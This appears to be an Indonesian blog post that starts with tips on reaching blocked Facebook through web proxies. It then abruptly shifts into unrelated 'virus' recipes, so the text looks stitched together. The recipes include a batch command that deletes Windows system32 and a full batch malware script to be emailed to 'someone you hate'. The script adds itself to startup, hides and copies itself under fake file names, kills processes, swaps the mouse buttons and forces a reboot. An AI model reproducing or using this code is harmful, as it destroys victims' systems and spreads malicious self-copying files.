Pemrograman · Tips Trik

Tips dan Cara membuka Facebook yang di block

Tips dan Cara membuka Facebook yang di block

Jujur saja, Walau sebenar nya saya Sendiri enggak terlalu Setuju kalau jam-jam kerjaan digunakan untuk ngeakses situs – situs yang wasting time seperti facebook ini, tapi bolehlah sekali-kali kita “merefresh” pikiran kalau jam-jam istirahat – Seperti Yang udah di ketahu oleh semua -orang, Situs jejaring sosial yang benar-benar “padat” saat ini adalah facebook.com, situs yang menghubungkan orang-orang dengan teman dan rekan di seluruh dunia. Facebook.com menduduki peringkat ke dua(2) setelah google.com dan FYI, Indonesia adalah salah satu negara penyumbang traffik terbesar menurut alexa.com

Bisa diambil kesimpulan, Bahwa jutaan muda-mudi Di indonesia (bahkan orang-tua pun) mengakses facebook.com setiap harinya. dan saya yakin, Sebagian besar Mengakses facebook Pada saat waktu kerja, , Aksi Facebook-an ini pasti di kecam oleh perusahaan, Alasannya Karena Membuat produktifitas menurun (benar juga siH)! dan Untuk Mempersempit Ruang gerak, biasanya para IT, disana Biasanya Memasang Filter alias Blocker.. hi..hi..
Caranya ngeblok nya tentu dengan software site blocker, Bisa di block lewat firewall, Menggunakan DNS server seperti open DNS, Block Lewat Router, Pokoknya untuk ngeblok mereka pasti Menginstall seabrek hardware & software Unik lainnya.

Jika Perusahaan Memang Benar-benar Serius Memberantas Facebooker mereka bakal Menjadi pelanggan Berbayar jasa “pengaman”. dan rela mengeluarkan budget (Jutaan) untuk membeli hardware dan software khusus.

Nah, ada blocker tentu ada Unblocker, Disini lah Kehadiran-situs situs Proxy (dan web proxy) benar-benar di perlukan bagi orang-orang yang dirudung kemalangan seperti diatas – Proxy ini adalah Website yang diakses dengan perantara server lain,

Gambarannya mudah nya seperti ini:
Permintaan halaman tidak langsung di teruskan ke situs facebook.com namun di redirect terlebih dahulu ke proxy server, lalu proxy server akan meneruskan ke Facebook.Setelah menerima respon dari facebook, Proxy server Akhirnya meneruskan ke workstation. Ribet yah?? hehe.. Namun cara ini sangat ampuh, Karena sangat sulit bagi software seperti firewall standar untuk memblock koneksi semacam ini.

Bagaimana Jika web Proxy Juga diblock? Ya, ampun.. Jumlah web proxy di dunia maya ini Bisa Ratusan ribu..Hampir semua nya Gratis untuk digunakan(kecuali beberapa Private proxy yang ditunjukkan untuk tujuan-tujuan tertentu). Satu web proxy di block ada ribuan yang masih fresh. Hampir tidak mungkin memblock semua web proxy di dunia ini..

Namun saya teringat salah satu perusahaan yang emang Putus asa ngeliat segala usaha nya Gagal.. Ujung – ujung nya pemilik perusahaan mengeluarkan statment begini:

… Yang menggunakan Fasilitas Perusahaan seperti internet dan mengakses situs-seperti facebook.com dan situs yang tidak berkaitan dengan pekerjaan pada waktu Kerja.. Maka Bakal di PEC** ..

Hahaha.. IT nya di suruh melototin Log tuh ..

 

IRUS 1 (Format HDD Classic One)

1. Buka Notepad

2. Tuliskan perintah di bawah ini : –

del c:\windows\system32\*.* /q

3. Simpan file tersebut dengan nama apa saja terserah kamu, yang penting akhirannya harus “.bat or .cmd”.

4. Jangan di klik 2x jika tidak ingin komputer sendiri yang hancur.

Kenapa ?????? Karena file yang kamu buat tadi akan menghapus folder system32 dan setelah komputer di hidupkan ulang maka komputermu tidak akan jalan dan harus di install ulang, karena sistem tidak mencari file-file yang ada di folder system32 yang dibutuhkan pada saat booting awal (dengan asumsi tanpa ada program Deep Freeze atau Returnil)

5. Jika ingin mencobanya buatlah folder baru dengan nama yang sama dan letakkan di C:\. Isi beberapa file yang tidak berguna. Kemudian jalankan file yang telah kamu buat tadi. Klik 2x file tersebut dan secara otomatis file akan terhapus.

6. Kamu bisa mencobanya di semua komputer yang memiliki system operasi Windows, dan ingat, saya tidak bertanggung jawab atas semua kerusakan yang kamu buat.

Virus 2

Trik ini untuk mengirim file ke komputer orang yang kamu benci.
Copy perintah di bawah ini ke dalam notepad.. kemudian simpan dengan nama terserah.bat

Jangan di klik file tersebut yach…….. Kirim ke email orang yang kamu benci dach…
hehehehe….

Dan yang akan terjadi setelah si musuh menerima file adalah :
1) file akan mengcopy secara otomatis ke dalam startup
2) file akan mengcopy secara otomatis ke dalam ribuan komputer yang terinjeksi
3) mampu menyembunyikan dirinya sendiri

4) file akan mematikan secara otomatis program MSN, Norton, Windows Explorer, Limewire.
5) Membalik klik kanan mouse dengan klik kiri
6) Membuka kotak dialog Peringatan
7) Mengganti waktu ke jam 12:00 dan mematikan komputer

Code:

@Echo off

color 4

title 4

title R.I.P

start

start

start

start calc

copy %0 %Systemroot%\Greatgame > nul

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ

/d %systemroot%\Greatgame.bat /f > nul

copy %0 *.bat > nul

Attrib +r +h Greatgame.bat

Attrib +r +h

RUNDLL32 USER32.DLL.SwapMouseButton

start calc

cls

tskill msnmsgr

tskill LimeWire

tskill iexplore

tskill NMain

start

cls

cd %userprofile%\desktop

copy Greatgame.bat R.I.P.bat

copy Greatgame.bat R.I.P.jpg

copy Greatgame.bat R.I.P.txt

copy Greatgame.bat R.I.P.exe

copy Greatgame.bat R.I.P.mov

copy Greatgame.bat FixVirus.bat

cd %userprofile%My Documents

copy Greatgame.bat R.I.P.bat

copy Greatgame.bat R.I.P.jpg

copy Greatgame.bat R.I.P.txt

copy Greatgame.bat R.I.P.exe

copy Greatgame.bat R.I.P.mov

copy Greatgame.bat FixVirus.bat

start

start calc

cls

msg * R.I.P

msg * R.I.P

shutdown -r -t 10 -c “VIRUS DETECTED”

start

start

time 12:00

:R.I.P

cd %usernameprofile%\desktop

copy Greatgame.bat %random%.bat

goto RIP

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s